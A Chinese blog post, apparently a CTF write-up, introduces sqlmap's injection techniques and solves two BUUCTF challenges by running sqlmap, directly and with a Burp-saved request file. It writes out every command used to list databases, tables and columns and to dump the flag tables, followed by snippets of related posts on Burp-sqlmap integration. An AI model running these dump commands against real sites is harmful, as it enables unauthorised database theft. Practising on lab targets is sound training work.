sqlmap和burp配合使用辅助注入

已于 2022-01-28 15:44:55 修改
阅读量3.3k 收藏 15
点赞数 6
文章标签: web安全 安全 数据库 sql kali linux
于 2022-01-28 15:44:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Cooola_P/article/details/122732118
版权

在这里插入图片描述

首先介绍一下sqlmap:

sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是:

1)基于布尔的盲注,即可以根据返回页面判断条件真假的注入。

2)基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。

3)基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。

4)联合查询注入,可以使用union的情况下的注入。

5)堆查询注入,可以同时执行多条语句的执行时的注入。

sqlmap基本注入方式参数有以下几种:

B:Boolean-based blind(布尔型注入)

E:Error-based(报错型注入)

U:Union query-based(可联合查询注入)

S:Stacked queries(可多语句查询注入)

T:Time-based blind(基于时间延迟注入)

Q:Inline queries(嵌套查询注入)

用法:

–technique BEUSTQ

下面以两道题目为例介绍基本用法

例题1:

题目来源:buuctf

在这里插入图片描述

第一种解法可用union注入方式手动注入,但今天主要还是通过sqlmap进行解题

在这里插入图片描述

直接输入命令:

sqlmap -u http://d7d9afc3-5fb4-4321-b9ab-5684e4eb3706.node4.buuoj.cn:81/index.php?id=1a --dbs

爆出数据库

在这里插入图片描述

一般表名会在information_schema中的tables表中

因此输入命令:

sqlmap -u http://d7d9afc3-5fb4-4321-b9ab-5684e4eb3706.node4.buuoj.cn:81/index.php?id=1a -D information_schema --tables

爆出表名tables

在这里插入图片描述

输入命令:

sqlmap -u http://d7d9afc3-5fb4-4321-b9ab-5684e4eb3706.node4.buuoj.cn:81/index.php?id=1a -D information_schema -T tables --columns

爆出字段名

在这里插入图片描述

寻找其中table_name:

sqlmap -u http://d7d9afc3-5fb4-4321-b9ab-5684e4eb3706.node4.buuoj.cn:81/index.php?id=1a -D information_schema -T tables -C table_name --dump

爆出所有字段

其中有个表名为fl4g,推测其存在flag

在这里插入图片描述

输入命令:

sqlmap -u http://d7d9afc3-5fb4-4321-b9ab-5684e4eb3706.node4.buuoj.cn:81/index.php?id=1a -T fl4g --columns

爆出字段名

在这里插入图片描述

进而用

sqlmap -u http://d7d9afc3-5fb4-4321-b9ab-5684e4eb3706.node4.buuoj.cn:81/index.php?id=1a -T fl4g -C fllllag --dump

爆出字段

即可获取flag:n1book{union_select_is_so_cool}

在这里插入图片描述

例题2:

题目来源:buuctf

在这里插入图片描述
在这里插入图片描述

查看源码,发现在url后加入?tips=1可开启错误提示,因此想到可以使用报错注入方式

同样也可使用sqlmap注入

可以先用burp抓包后再用sqlmap注入两者联动的方式进行解题

抓包后右键copy to file进行保存,这里命名为1.txt

在这里插入图片描述
在这里插入图片描述

使用命令sqlmap -r '文件名’进行文件读取

和上题相似,第一步爆库:

sqlmap -r '1.txt' --technique E --dbs

在这里插入图片描述

推测数据库名在information_schema库中的tables表中,因此先爆表:

sqlmap -r '1.txt' -D information_schema --tables

在这里插入图片描述

接着爆字段名:

sqlmap -r '1.txt' -D information_schema -T tables --columns

在这里插入图片描述

然后爆table_name中的字段:

sqlmap -r '1.txt' -D information_schema -T tables -C table_name --dump

在这里插入图片描述

推测flag在fl4g表中,直接访问fl4g表中的字段名:

sqlmap -r '1.txt' -T fl4g --columns

在这里插入图片描述

发现报错,可能是因为MySQL版本高于5.0

只能一步一步找数据库:

在这里插入图片描述

这是我们上面爆出来的库,推测fl4g表只可能在mysql库或者note库中,

首先爆mysql库:

sqlmap -r '1.txt' -D mysql -T fl4g --columns

并没有fl4g表

接着爆note库:

sqlmap -r '1.txt' -D note -T fl4g --columns

在这里插入图片描述

发现字段名flag

访问flag:

sqlmap -r '1.txt' -D note -T fl4g -C flag --dump

在这里插入图片描述

获得flag:n1book{login_sqli_is_nice}

Cooola_P
关注
  • 6
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
burp爆破mysql_[技巧]使用Burpsuite辅助Sqlmap进行POST注入测试
weixin_28877505的博客
01-26 855
我们在使用Sqlmap进行post型注入时,经常会出现请求遗漏导致注入失败的情况。这里分享一个小技巧,即结合burpsuite来使用sqlmap,用这种方法进行post注入测试会更准确,操作起来也非常容易。1.浏览器打开目标地址http://testasp.vulnweb.com/Login.asp2.配置burp代理(127.0.0.1:8080)以拦截请求3.点击login表单的sub...
网络逻辑漏洞、SQLMAP、Nmap、burpsuite及其命令的使用方法
weixin_65695770的博客
04-07 4185
SQLMAP sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试神器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, SQL Server, Microsoft Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。 sqlmap支持五种不同的注入
sqlmap burp 联动插件
04-25
sqlmap burp 联动插件
burpsuite和sqlmap配合,通过sql注入漏洞爆oracle当前用户
最新发布
zhj9705的博客
07-15 307
注:--proxy=http://127.0.0.1:8080是为了burpsuite里面HTTP history可以看到记录,方便检查访问是正常的,后续为了性能,可以不要。3.点击有注入漏洞的历史记录,保存到文件zhj.txt。burpsuite_pro_v2023.6安装成功。4.编辑保存的文件zhj.txt,找到注入点,加入。..............等待成果。2.在浏览器里面操作,可看历史记录。sqlmap代码下载。
sqlmap简介
热门推荐
taozpwater的专栏
03-30 1万+
1、简介     sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是:
SQLMap工具与Burpsuite信息联动
fzy2003的博客
07-03 1885
通过本次实验,成功实现了SQLMap调用burpsuit代理抓包信息进行SQL注入,掌握如何高效利用其它工具信息来进行SQL注入
Burp联动Sqlmap插件
1
03-15 3842
插件介绍 sqlmap4burp++是一款兼容Windows,mac,linux多个系统平台的Burpsqlmap联动插件 这个插件嘎嘎好用,大大提升了sqlmap的效率 项目地址 https://github.com/c0ny1/sqlmap4burp-plus-plus 安装 进入burp拓展模块 点击添加 上传文件 找到下载的插件上传 使用 在数据包页面右击,选择对应的插件进行使用 配置好对应的参数就直接跳转到sqlmap开始运行了 ...
SQL注入使用brupSuite辅助注入sqlmap使用
05-30
通过上述介绍,我们可以看到使用Burp Suite和sqlmap可以帮助我们更好地理解和实施SQL注入测试。无论是手动还是自动化的测试方法,都需要对SQL注入原理有深刻的理解。希望本文能够帮助读者更好地掌握这些技能,提升...
【合天网安】利用sqlmap辅助手工注入
hehigoxqc606的博客
09-02 494
实验背景: SQLmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL、、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite 、Firebird、Sybase和SAP MaxDB。SQL Map采用了以下5种独特的SQL注入技术。 基于布尔型的盲注,即可以根据页面返回页面判断条件真假的注入。 基于时间的盲注,即不能根据页面返回的内
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3081
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
SqlmapDnsCollaborator:Burp扩展,可​​让您将Burp Collaborator用作DNS服务器,以通过Sqlmap渗出数据
02-14
SqlmapDnsCollaborator SqlmapDnsCollaborator是一个Burp扩展,可​​让您使用零配置的Sqlmap执行DNS渗透。 您将不需要DNS服务器或公共IP,只需一台具有SqlmapBurp的计算机即可。 通常如何使用Sqlmap执行DNS渗透: 您设置了DNS服务器! 您在该服务器上运行Sqlmap,该服务器对易受攻击的目标执行一些SQL注入。 易受攻击的目标将包含有趣数据的DNS请求发送到您的DNS服务器。 DNS请求由Sqlmap解释。 如何使用SqlmapSqlmapDnsCollaborator执行DNS渗透: 您在计算机上打开Burp并启用SqlmapDnsCollaborator。 您在计算机上运行Sqlmap,这会对易受攻击的目标执行一些SQL注入。 易受攻击的目标将包含有趣数据的DNS请求发送到Burp Colla
sql注入 BurpSuite与sqlmap联动,sqlmap友好图形化界面解决办法 CO2(sqlmap插件) 使用
qq_62433118的博客
10-26 1670
sql注入BurpSuite与sqlmap联动,sqlmap友好界面解决办法 CO2(sqlmap插件) 使用
[Web安全入门]在BURP中配置SQLMap详解
_DESpiSED的博客
09-17 1423
本文详细介绍了BURPSQLMap的联动使用过程中所用到的配置过程
Burp+sqlmap测试SQL注入
香蕉~不拿呐
08-03 2088
免责声明: 此文章仅用于学习研究使用,请勿用于违法犯罪,请遵守《网络安全法》等相关法律法规。 Burp+sqlmap测试SQL注入 本文主要讲述Burpsqlmap工具联动测试SQL注入 环境准备 具有python环境 系统中有sqlmap Burp插件安装: 先下载好jython.jar文件https://www.jython.org/download.html 在Burpsuite的Extender中添加jython路径 在BApp Store中安装sqlmapSQLipy模.
burpsuite与sqlmap联动(sqlipy配置)
Welcome To Myon'Blog !
12-21 1345
下载好之后将这个jar文件放到某个位置(我是直接拉到了burpsuite位置),然后导入该路径。解压sqlmap的压缩包后里面有一个sqlmapapi.py的文件。第二个路径为你自己Python环境的路径,需要写到lib文件夹。关于配置burpsuite与sqlmap联动的介绍至此结束。找到 sqlipy sqlmap integration。下载好后解压,里面还有一个sqlmap的压缩包,一并解压。在burpsuite的sqlipy框进行配置。安装成功后会多出一个sqlipy的框。
探索SQLMap for Burp:提升Web安全测试效率的新利器
gitblog_00063的博客
03-27 273
探索SQLMap for Burp:提升Web安全测试效率的新利器 项目地址:https://gitcode.com/difcareer/sqlmap4burp SQLMap 是一个知名的自动化SQL注入工具,它帮助网络安全专家检测和利用SQL注入漏洞。而 SQLMap for Burp 则是将SQLMap的功能集成到了流行的Web应用安全测试工具Burp Suite中,为渗透测试者带来了更为便捷...
Burp Suite安装SQLmap
weixin_42515203的博客
05-13 264
如何再Burp Suite上安装SQLmap插件
Burpsuite 联合 sqlmap
weixin_42751423的博客
05-08 273
文章参考 https://www.cnblogs.com/yoyoyang/p/11811346.html 新版本burpsuite
加强版sqlmap4burp插件
08-14
嗨!对于加强版sqlmap4burp插件我可以为您提供一些信息。sqlmap4burp是一个在Burp Suite中集成了sqlmap的插件,它可以帮助您自动化SQL注入渗透测试。要获得加强版sqlmap4burp插件,您可以尝试以下方法之一: 1. 自定义开发:您可以自己进行插件的扩展和定制开发,以满足您的需求。这需要您具备一定的编程技能和对Burp Suite插件开发的了解。 2. 寻找开源社区:在开源社区中,可能有其他开发人员已经对sqlmap4burp进行了扩展和升级。您可以在GitHub等代码托管平台上搜索相关项目,看看是否有符合您需求的版本。 3. 与开发者联系:如果您有特定的需求,可以直接与sqlmap4burp的开发者联系,向他们提出您的需求和建议。他们可能会提供给您一个加强版插件或者给出相关的建议。 希望这些信息对您有所帮助!如果您还有其他问题,请随时提问。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值